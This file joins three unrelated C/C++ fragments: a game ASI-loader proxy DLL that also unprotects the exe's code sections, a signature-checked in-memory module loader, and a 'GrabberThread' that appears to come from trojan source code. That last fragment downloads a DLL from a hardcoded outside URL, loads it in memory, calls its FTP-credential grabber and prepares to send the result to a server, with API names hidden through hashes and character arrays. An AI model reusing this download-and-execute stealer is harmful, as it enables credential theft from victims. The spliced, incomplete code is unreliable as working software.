GetProcAddress(winmmbase.dll, "DriverCallback"); winmmbase.DrvGetModuleHandle = GetProcAddress(winmmbase.dll, "DrvGetModuleHandle"); winmmbase.GetDriverModuleHandle = GetProcAddress(winmmbase.dll, "GetDriverModuleHandle"); winmmbase.OpenDriver = GetProcAddress(winmmbase.dll, "OpenDriver"); winmmbase.SendDriverMessage = GetProcAddress(winmmbase.dll, "SendDriverMessage"); winmmbase.auxGetDevCapsA = GetProcAddress(winmmbase.dll, "auxGetDevCapsA"); winmmbase.auxGetDevCapsW = GetProcAddress(winmmbase.dll, "auxGetDevCapsW"); winmmbase.auxGetNumDevs = GetProcAddress(winmmbase.dll, "auxGetNumDevs"); winmmbase.auxGetVolume = GetProcAddress(winmmbase.dll, "auxGetVolume"); winmmbase.auxOutMessage = GetProcAddress(winmmbase.dll, "auxOutMessage"); winmmbase.auxSetVolume = GetProcAddress(winmmbase.dll, "auxSetVolume"); winmmbase.joyConfigChanged = GetProcAddress(winmmbase.dll, "joyConfigChanged"); winmmbase.joyGetDevCapsA = GetProcAddress(winmmbase.dll, "joyGetDevCapsA"); winmmbase.joyGetDevCapsW = GetProcAddress(winmmbase.dll, "joyGetDevCapsW"); winmmbase.joyGetNumDevs = GetProcAddress(winmmbase.dll, "joyGetNumDevs"); winmmbase.joyGetPos = GetProcAddress(winmmbase.dll, "joyGetPos"); winmmbase.joyGetPosEx = GetProcAddress(winmmbase.dll, "joyGetPosEx"); winmmbase.joyGetThreshold = GetProcAddress(winmmbase.dll, "joyGetThreshold"); winmmbase.joyReleaseCapture = GetProcAddress(winmmbase.dll, "joyReleaseCapture"); winmmbase.joySetCapture = GetProcAddress(winmmbase.dll, "joySetCapture"); winmmbase.joySetThreshold = GetProcAddress(winmmbase.dll, "joySetThreshold"); winmmbase.midiConnect = GetProcAddress(winmmbase.dll, "midiConnect"); winmmbase.midiDisconnect = GetProcAddress(winmmbase.dll, "midiDisconnect"); winmmbase.midiInAddBuffer = GetProcAddress(winmmbase.dll, "midiInAddBuffer"); winmmbase.midiInClose = GetProcAddress(winmmbase.dll, "midiInClose"); winmmbase.midiInGetDevCapsA = GetProcAddress(winmmbase.dll, "midiInGetDevCapsA"); winmmbase.midiInGetDevCapsW = GetProcAddress(winmmbase.dll, "midiInGetDevCapsW"); winmmbase.midiInGetErrorTextA = GetProcAddress(winmmbase.dll, "midiInGetErrorTextA"); winmmbase.midiInGetErrorTextW = GetProcAddress(winmmbase.dll, "midiInGetErrorTextW"); winmmbase.midiInGetID = GetProcAddress(winmmbase.dll, "midiInGetID"); winmmbase.midiInGetNumDevs = GetProcAddress(winmmbase.dll, "midiInGetNumDevs"); winmmbase.midiInMessage = GetProcAddress(winmmbase.dll, "midiInMessage"); winmmbase.midiInOpen = GetProcAddress(winmmbase.dll, "midiInOpen"); winmmbase.midiInPrepareHeader = GetProcAddress(winmmbase.dll, "midiInPrepareHeader"); winmmbase.midiInReset = GetProcAddress(winmmbase.dll, "midiInReset"); winmmbase.midiInStart = GetProcAddress(winmmbase.dll, "midiInStart"); winmmbase.midiInStop = GetProcAddress(winmmbase.dll, "midiInStop"); winmmbase.midiInUnprepareHeader = GetProcAddress(winmmbase.dll, "midiInUnprepareHeader"); winmmbase.midiOutCacheDrumPatches = GetProcAddress(winmmbase.dll, "midiOutCacheDrumPatches"); winmmbase.midiOutCachePatches = GetProcAddress(winmmbase.dll, "midiOutCachePatches"); winmmbase.midiOutClose = GetProcAddress(winmmbase.dll, "midiOutClose"); winmmbase.midiOutGetDevCapsA = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsA"); winmmbase.midiOutGetDevCapsW = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsW"); winmmbase.midiOutGetErrorTextA = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextA"); winmmbase.midiOutGetErrorTextW = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextW"); winmmbase.midiOutGetID = GetProcAddress(winmmbase.dll, "midiOutGetID"); winmmbase.midiOutGetNumDevs = GetProcAddress(winmmbase.dll, "midiOutGetNumDevs"); winmmbase.midiOutGetVolume = GetProcAddress(winmmbase.dll, "midiOutGetVolume"); winmmbase.midiOutLongMsg = GetProcAddress(winmmbase.dll, "midiOutLongMsg"); winmmbase.midiOutMessage = GetProcAddress(winmmbase.dll, "midiOutMessage"); winmmbase.midiOutOpen = GetProcAddress(winmmbase.dll, "midiOutOpen"); winmmbase.midiOutPrepareHeader = GetProcAddress(winmmbase.dll, "midiOutPrepareHeader"); winmmbase.midiOutReset = GetProcAddress(winmmbase.dll, "midiOutReset"); winmmbase.midiOutSetVolume = GetProcAddress(winmmbase.dll, "midiOutSetVolume"); winmmbase.midiOutShortMsg = GetProcAddress(winmmbase.dll, "midiOutShortMsg"); winmmbase.midiOutUnprepareHeader = GetProcAddress(winmmbase.dll, "midiOutUnprepareHeader"); winmmbase.midiStreamClose = GetProcAddress(winmmbase.dll, "midiStreamClose"); winmmbase.midiStreamOpen = GetProcAddress(winmmbase.dll, "midiStreamOpen"); winmmbase.midiStreamOut = GetProcAddress(winmmbase.dll, "midiStreamOut"); winmmbase.midiStreamPause = GetProcAddress(winmmbase.dll, "midiStreamPause"); winmmbase.midiStreamPosition = GetProcAddress(winmmbase.dll, "midiStreamPosition"); winmmbase.midiStreamProperty = GetProcAddress(winmmbase.dll, "midiStreamProperty"); winmmbase.midiStreamRestart = GetProcAddress(winmmbase.dll, "midiStreamRestart"); winmmbase.midiStreamStop = GetProcAddress(winmmbase.dll, "midiStreamStop"); winmmbase.mixerClose = GetProcAddress(winmmbase.dll, "mixerClose"); winmmbase.mixerGetControlDetailsA = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsA"); winmmbase.mixerGetControlDetailsW = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsW"); winmmbase.mixerGetDevCapsA = GetProcAddress(winmmbase.dll, "mixerGetDevCapsA"); winmmbase.mixerGetDevCapsW = GetProcAddress(winmmbase.dll, "mixerGetDevCapsW"); winmmbase.mixerGetID = GetProcAddress(winmmbase.dll, "mixerGetID"); winmmbase.mixerGetLineControlsA = GetProcAddress(winmmbase.dll, "mixerGetLineControlsA"); winmmbase.mixerGetLineControlsW = GetProcAddress(winmmbase.dll, "mixerGetLineControlsW"); winmmbase.mixerGetLineInfoA = GetProcAddress(winmmbase.dll, "mixerGetLineInfoA"); winmmbase.mixerGetLineInfoW = GetProcAddress(winmmbase.dll, "mixerGetLineInfoW"); winmmbase.mixerGetNumDevs = GetProcAddress(winmmbase.dll, "mixerGetNumDevs"); winmmbase.mixerMessage = GetProcAddress(winmmbase.dll, "mixerMessage"); winmmbase.mixerOpen = GetProcAddress(winmmbase.dll, "mixerOpen"); winmmbase.mixerSetControlDetails = GetProcAddress(winmmbase.dll, "mixerSetControlDetails"); winmmbase.mmDrvInstall = GetProcAddress(winmmbase.dll, "mmDrvInstall"); winmmbase.mmGetCurrentTask = GetProcAddress(winmmbase.dll, "mmGetCurrentTask"); winmmbase.mmTaskBlock = GetProcAddress(winmmbase.dll, "mmTaskBlock"); winmmbase.mmTaskCreate = GetProcAddress(winmmbase.dll, "mmTaskCreate"); winmmbase.mmTaskSignal = GetProcAddress(winmmbase.dll, "mmTaskSignal"); winmmbase.mmTaskYield = GetProcAddress(winmmbase.dll, "mmTaskYield"); winmmbase.mmioAdvance = GetProcAddress(winmmbase.dll, "mmioAdvance"); winmmbase.mmioAscend = GetProcAddress(winmmbase.dll, "mmioAscend"); winmmbase.mmioClose = GetProcAddress(winmmbase.dll, "mmioClose"); winmmbase.mmioCreateChunk = GetProcAddress(winmmbase.dll, "mmioCreateChunk"); winmmbase.mmioDescend = GetProcAddress(winmmbase.dll, "mmioDescend"); winmmbase.mmioFlush = GetProcAddress(winmmbase.dll, "mmioFlush"); winmmbase.mmioGetInfo = GetProcAddress(winmmbase.dll, "mmioGetInfo"); winmmbase.mmioInstallIOProcA = GetProcAddress(winmmbase.dll, "mmioInstallIOProcA"); winmmbase.mmioInstallIOProcW = GetProcAddress(winmmbase.dll, "mmioInstallIOProcW"); winmmbase.mmioOpenA = GetProcAddress(winmmbase.dll, "mmioOpenA"); winmmbase.mmioOpenW = GetProcAddress(winmmbase.dll, "mmioOpenW"); winmmbase.mmioRead = GetProcAddress(winmmbase.dll, "mmioRead"); winmmbase.mmioRenameA = GetProcAddress(winmmbase.dll, "mmioRenameA"); winmmbase.mmioRenameW = GetProcAddress(winmmbase.dll, "mmioRenameW"); winmmbase.mmioSeek = GetProcAddress(winmmbase.dll, "mmioSeek"); winmmbase.mmioSendMessage = GetProcAddress(winmmbase.dll, "mmioSendMessage"); winmmbase.mmioSetBuffer = GetProcAddress(winmmbase.dll, "mmioSetBuffer"); winmmbase.mmioSetInfo = GetProcAddress(winmmbase.dll, "mmioSetInfo"); winmmbase.mmioStringToFOURCCA = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCA"); winmmbase.mmioStringToFOURCCW = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCW"); winmmbase.mmioWrite = GetProcAddress(winmmbase.dll, "mmioWrite"); winmmbase.sndOpenSound = GetProcAddress(winmmbase.dll, "sndOpenSound"); winmmbase.waveInAddBuffer = GetProcAddress(winmmbase.dll, "waveInAddBuffer"); winmmbase.waveInClose = GetProcAddress(winmmbase.dll, "waveInClose"); winmmbase.waveInGetDevCapsA = GetProcAddress(winmmbase.dll, "waveInGetDevCapsA"); winmmbase.waveInGetDevCapsW = GetProcAddress(winmmbase.dll, "waveInGetDevCapsW"); winmmbase.waveInGetErrorTextA = GetProcAddress(winmmbase.dll, "waveInGetErrorTextA"); winmmbase.waveInGetErrorTextW = GetProcAddress(winmmbase.dll, "waveInGetErrorTextW"); winmmbase.waveInGetID = GetProcAddress(winmmbase.dll, "waveInGetID"); winmmbase.waveInGetNumDevs = GetProcAddress(winmmbase.dll, "waveInGetNumDevs"); winmmbase.waveInGetPosition = GetProcAddress(winmmbase.dll, "waveInGetPosition"); winmmbase.waveInMessage = GetProcAddress(winmmbase.dll, "waveInMessage"); winmmbase.waveInOpen = GetProcAddress(winmmbase.dll, "waveInOpen"); winmmbase.waveInPrepareHeader = GetProcAddress(winmmbase.dll, "waveInPrepareHeader"); winmmbase.waveInReset = GetProcAddress(winmmbase.dll, "waveInReset"); winmmbase.waveInStart = GetProcAddress(winmmbase.dll, "waveInStart"); winmmbase.waveInStop = GetProcAddress(winmmbase.dll, "waveInStop"); winmmbase.waveInUnprepareHeader = GetProcAddress(winmmbase.dll, "waveInUnprepareHeader"); winmmbase.waveOutBreakLoop = GetProcAddress(winmmbase.dll, "waveOutBreakLoop"); winmmbase.waveOutClose = GetProcAddress(winmmbase.dll, "waveOutClose"); winmmbase.waveOutGetDevCapsA = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsA"); winmmbase.waveOutGetDevCapsW = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsW"); winmmbase.waveOutGetErrorTextA = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextA"); winmmbase.waveOutGetErrorTextW = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextW"); winmmbase.waveOutGetID = GetProcAddress(winmmbase.dll, "waveOutGetID"); winmmbase.waveOutGetNumDevs = GetProcAddress(winmmbase.dll, "waveOutGetNumDevs"); winmmbase.waveOutGetPitch = GetProcAddress(winmmbase.dll, "waveOutGetPitch"); winmmbase.waveOutGetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutGetPlaybackRate"); winmmbase.waveOutGetPosition = GetProcAddress(winmmbase.dll, "waveOutGetPosition"); winmmbase.waveOutGetVolume = GetProcAddress(winmmbase.dll, "waveOutGetVolume"); winmmbase.waveOutMessage = GetProcAddress(winmmbase.dll, "waveOutMessage"); winmmbase.waveOutOpen = GetProcAddress(winmmbase.dll, "waveOutOpen"); winmmbase.waveOutPause = GetProcAddress(winmmbase.dll, "waveOutPause"); winmmbase.waveOutPrepareHeader = GetProcAddress(winmmbase.dll, "waveOutPrepareHeader"); winmmbase.waveOutReset = GetProcAddress(winmmbase.dll, "waveOutReset"); winmmbase.waveOutRestart = GetProcAddress(winmmbase.dll, "waveOutRestart"); winmmbase.waveOutSetPitch = GetProcAddress(winmmbase.dll, "waveOutSetPitch"); winmmbase.waveOutSetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutSetPlaybackRate"); winmmbase.waveOutSetVolume = GetProcAddress(winmmbase.dll, "waveOutSetVolume"); winmmbase.waveOutUnprepareHeader = GetProcAddress(winmmbase.dll, "waveOutUnprepareHeader"); winmmbase.waveOutWrite = GetProcAddress(winmmbase.dll, "waveOutWrite"); winmmbase.winmmbaseFreeMMEHandles = GetProcAddress(winmmbase.dll, "winmmbaseFreeMMEHandles"); winmmbase.winmmbaseGetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseGetWOWHandle"); winmmbase.winmmbaseHandle32FromHandle16 = GetProcAddress(winmmbase.dll, "winmmbaseHandle32FromHandle16"); winmmbase.winmmbaseSetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseSetWOWHandle"); } else { if (_stricmp(DllName + 1, "msacm32.dll") == NULL) { msacm32.dll = LoadLibrary(szSystemPath); msacm32.acmDriverAddA = GetProcAddress(msacm32.dll, "acmDriverAddA"); msacm32.acmDriverAddW = GetProcAddress(msacm32.dll, "acmDriverAddW"); msacm32.acmDriverClose = GetProcAddress(msacm32.dll, "acmDriverClose"); msacm32.acmDriverDetailsA = GetProcAddress(msacm32.dll, "acmDriverDetailsA"); msacm32.acmDriverDetailsW = GetProcAddress(msacm32.dll, "acmDriverDetailsW"); msacm32.acmDriverEnum = GetProcAddress(msacm32.dll, "acmDriverEnum"); msacm32.acmDriverID = GetProcAddress(msacm32.dll, "acmDriverID"); msacm32.acmDriverMessage = GetProcAddress(msacm32.dll, "acmDriverMessage"); msacm32.acmDriverOpen = GetProcAddress(msacm32.dll, "acmDriverOpen"); msacm32.acmDriverPriority = GetProcAddress(msacm32.dll, "acmDriverPriority"); msacm32.acmDriverRemove = GetProcAddress(msacm32.dll, "acmDriverRemove"); msacm32.acmFilterChooseA = GetProcAddress(msacm32.dll, "acmFilterChooseA"); msacm32.acmFilterChooseW = GetProcAddress(msacm32.dll, "acmFilterChooseW"); msacm32.acmFilterDetailsA = GetProcAddress(msacm32.dll, "acmFilterDetailsA"); msacm32.acmFilterDetailsW = GetProcAddress(msacm32.dll, "acmFilterDetailsW"); msacm32.acmFilterEnumA = GetProcAddress(msacm32.dll, "acmFilterEnumA"); msacm32.acmFilterEnumW = GetProcAddress(msacm32.dll, "acmFilterEnumW"); msacm32.acmFilterTagDetailsA = GetProcAddress(msacm32.dll, "acmFilterTagDetailsA"); msacm32.acmFilterTagDetailsW = GetProcAddress(msacm32.dll, "acmFilterTagDetailsW"); msacm32.acmFilterTagEnumA = GetProcAddress(msacm32.dll, "acmFilterTagEnumA"); msacm32.acmFilterTagEnumW = GetProcAddress(msacm32.dll, "acmFilterTagEnumW"); msacm32.acmFormatChooseA = GetProcAddress(msacm32.dll, "acmFormatChooseA"); msacm32.acmFormatChooseW = GetProcAddress(msacm32.dll, "acmFormatChooseW"); msacm32.acmFormatDetailsA = GetProcAddress(msacm32.dll, "acmFormatDetailsA"); msacm32.acmFormatDetailsW = GetProcAddress(msacm32.dll, "acmFormatDetailsW"); msacm32.acmFormatEnumA = GetProcAddress(msacm32.dll, "acmFormatEnumA"); msacm32.acmFormatEnumW = GetProcAddress(msacm32.dll, "acmFormatEnumW"); msacm32.acmFormatSuggest = GetProcAddress(msacm32.dll, "acmFormatSuggest"); msacm32.acmFormatTagDetailsA = GetProcAddress(msacm32.dll, "acmFormatTagDetailsA"); msacm32.acmFormatTagDetailsW = GetProcAddress(msacm32.dll, "acmFormatTagDetailsW"); msacm32.acmFormatTagEnumA = GetProcAddress(msacm32.dll, "acmFormatTagEnumA"); msacm32.acmFormatTagEnumW = GetProcAddress(msacm32.dll, "acmFormatTagEnumW"); msacm32.acmGetVersion = GetProcAddress(msacm32.dll, "acmGetVersion"); msacm32.acmMetrics = GetProcAddress(msacm32.dll, "acmMetrics"); msacm32.acmStreamClose = GetProcAddress(msacm32.dll, "acmStreamClose"); msacm32.acmStreamConvert = GetProcAddress(msacm32.dll, "acmStreamConvert"); msacm32.acmStreamMessage = GetProcAddress(msacm32.dll, "acmStreamMessage"); msacm32.acmStreamOpen = GetProcAddress(msacm32.dll, "acmStreamOpen"); msacm32.acmStreamPrepareHeader = GetProcAddress(msacm32.dll, "acmStreamPrepareHeader"); msacm32.acmStreamReset = GetProcAddress(msacm32.dll, "acmStreamReset"); msacm32.acmStreamSize = GetProcAddress(msacm32.dll, "acmStreamSize"); msacm32.acmStreamUnprepareHeader = GetProcAddress(msacm32.dll, "acmStreamUnprepareHeader"); } else { if (_stricmp(DllName + 1, "xlive.dll") == NULL) { // Unprotect image - make .text and .rdata section writeable // get load address of the exe DWORD dwLoadOffset = (DWORD)GetModuleHandle(NULL); BYTE * pImageBase = reinterpret_cast<BYTE *>(dwLoadOffset); PIMAGE_DOS_HEADER pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER> (dwLoadOffset); PIMAGE_NT_HEADERS pNtHeader = reinterpret_cast<PIMAGE_NT_HEADERS> (pImageBase + pDosHeader->e_lfanew); PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeader); for (int iSection = 0; iSection < pNtHeader->FileHeader.NumberOfSections; ++iSection, ++pSection) { char * pszSectionName = reinterpret_cast<char *>(pSection->Name); if (!strcmp(pszSectionName, ".text") || !strcmp(pszSectionName, ".rdata")) { DWORD dwPhysSize = (pSection->Misc.VirtualSize + 4095) & ~4095; DWORD oldProtect; DWORD newProtect = (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE; if (!VirtualProtect(reinterpret_cast <VOID *>(dwLoadOffset + pSection->VirtualAddress), dwPhysSize, newProtect, &oldProtect)) { ExitProcess(0); } } } } else { MessageBox(0, "This library isn't supported. Try to rename it to d3d8.dll, d3d9.dll, d3d11.dll, winmmbase.dll, msacm32.dll, dinput8.dll, dsound.dll, vorbisFile.dll, xlive.dll or ddraw.dll.", "ASI Loader", MB_ICONERROR); ExitProcess(0); } } } } } } } } } } }
RPRIVATE_TESTABLE RBOOL loadModule ( rpHCPContext* hcpContext, rSequence seq ) { RBOOL isSuccess = FALSE; RU32 moduleIndex = (RU32)(-1); RPU8 tmpBuff = NULL; RU32 tmpSize = 0; RPU8 tmpSig = NULL; RU32 tmpSigSize = 0; rpal_thread_func pEntry = NULL; rpHCPModuleContext* modContext = NULL; OBFUSCATIONLIB_DECLARE( entryName, RP_HCP_CONFIG_MODULE_ENTRY ); OBFUSCATIONLIB_DECLARE( recvMessage, RP_HCP_CONFIG_MODULE_RECV_MESSAGE ); if( NULL != seq && NULL != hcpContext ) { for( moduleIndex = 0; moduleIndex < RP_HCP_CONTEXT_MAX_MODULES; moduleIndex++ ) { if( 0 == hcpContext->modules[ moduleIndex ].hThread ) { // Found an empty spot break; } } } if( RP_HCP_CONTEXT_MAX_MODULES != moduleIndex && (RU32)(-1) != moduleIndex ) { // We got an empty spot for our module if( rSequence_getRU8( seq, RP_TAGS_HCP_MODULE_ID, &(hcpContext->modules[ moduleIndex ].id ) ) && rSequence_getBUFFER( seq, RP_TAGS_BINARY, &tmpBuff, &tmpSize ) && rSequence_getBUFFER( seq, RP_TAGS_SIGNATURE, &tmpSig, &tmpSigSize ) && CRYPTOLIB_SIGNATURE_SIZE == tmpSigSize ) { // We got the data, now verify the buffer signature if( CryptoLib_verify( tmpBuff, tmpSize, getRootPublicKey(), tmpSig ) ) { // Ready to load the module rpal_debug_info( "loading module in memory" ); hcpContext->modules[ moduleIndex ].hModule = MemoryLoadLibrary( tmpBuff, tmpSize ); if( NULL != hcpContext->modules[ moduleIndex ].hModule ) { OBFUSCATIONLIB_TOGGLE( entryName ); pEntry = (rpal_thread_func)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule, (RPCHAR)entryName ); OBFUSCATIONLIB_TOGGLE( entryName ); if( NULL != pEntry ) { modContext = &(hcpContext->modules[ moduleIndex ].context); modContext->pCurrentId = &( hcpContext->currentId ); modContext->func_sendHome = doSend; modContext->isTimeToStop = rEvent_create( TRUE ); modContext->rpalContext = rpal_Context_get(); modContext->isOnlineEvent = hcpContext->isCloudOnline; if( NULL != modContext->isTimeToStop ) { hcpContext->modules[ moduleIndex ].isTimeToStop = modContext->isTimeToStop; OBFUSCATIONLIB_TOGGLE( recvMessage ); hcpContext->modules[ moduleIndex ].func_recvMessage = (rpHCPModuleMsgEntry)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule, (RPCHAR)recvMessage ); OBFUSCATIONLIB_TOGGLE( recvMessage ); hcpContext->modules[ moduleIndex ].hThread = rpal_thread_new( pEntry, modContext ); if( 0 != hcpContext->modules[ moduleIndex ].hThread ) { CryptoLib_hash( tmpBuff, tmpSize, &(hcpContext->modules[ moduleIndex ].hash ) ); hcpContext->modules[ moduleIndex ].isOsLoaded = FALSE; isSuccess = TRUE; } else { rpal_debug_warning( "Error creating handler thread for new module." ); } } } else { rpal_debug_warning( "Could not find new module's entry point." ); } } else { rpal_debug_warning( "Error loading module in memory." ); } } else { rpal_debug_warning( "New module signature invalid." ); } } else { rpal_debug_warning( "Could not find core module components to load." ); } // Main cleanup if( !isSuccess ) { if( NULL != modContext ) { IF_VALID_DO( modContext->isTimeToStop, rEvent_free ); } if( NULL != hcpContext->modules[ moduleIndex ].hModule ) { MemoryFreeLibrary( hcpContext->modules[ moduleIndex ].hModule ); } rpal_memory_zero( &(hcpContext->modules[ moduleIndex ] ), sizeof( hcpContext->modules[ moduleIndex ] ) ); } } else { rpal_debug_error( "Could not find a spot for new module, or invalid module id!" ); } return isSuccess; }
DWORD WINAPI GrabberThread( LPVOID lpData ) { UnhookDlls(); /* char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0}; ///if ( BotModule != NULL ) { typedef void ( WINAPI *PVNC_Start )(); HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); DWORD dwSize=GetFileSize(hFile,0); LPVOID BotModule = MemAlloc(dwSize); pReadFile(hFile,BotModule,dwSize,&dwSize,0); pCloseHandle(hFile); HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule ); if ( hLib == NULL ) { return 0; } PVNC_Start VNC_Start = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" ); ///PVNC_Start VNC_Start = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0"); VNC_Start(); while (true) pSleep(1); MemoryFreeLibrary( hLib ); MemFree( BotModule ); return 1; } */ //link.txt // char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/}; LPVOID BotModule = NULL; bool bKnock = false; while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL ) { HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule ); if ( hLib == NULL ) { return 0; } typedef char * ( WINAPI *PFTPGRAB )(); char GrabFTP[] = {'S','c','a','n','1', 0 }; char Ole32[] = {'o','l','e','3','2','.','d','l','l', 0}; typedef void ( WINAPI *PCoUninitialize )(); typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved ); PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D ); PCoInitialize pCoInitialize_ = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF ); pCoUninitialize_(); pCoInitialize_( NULL ); PFTPGRAB FtpGrabber = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP ); char *Buffer = FtpGrabber(); DWORD dwSize = m_lstrlen( Buffer ); if ( dwSize != 0 ) { Buffer[ dwSize ] = '\0'; bool Sended = false; do { // Отправляем данные на сервер Sended = true; if (!Sended) pSleep( 1000 ); } while (!Sended); } MemoryFreeLibrary( hLib ); MemFree( Buffer ); MemFree( BotModule ); }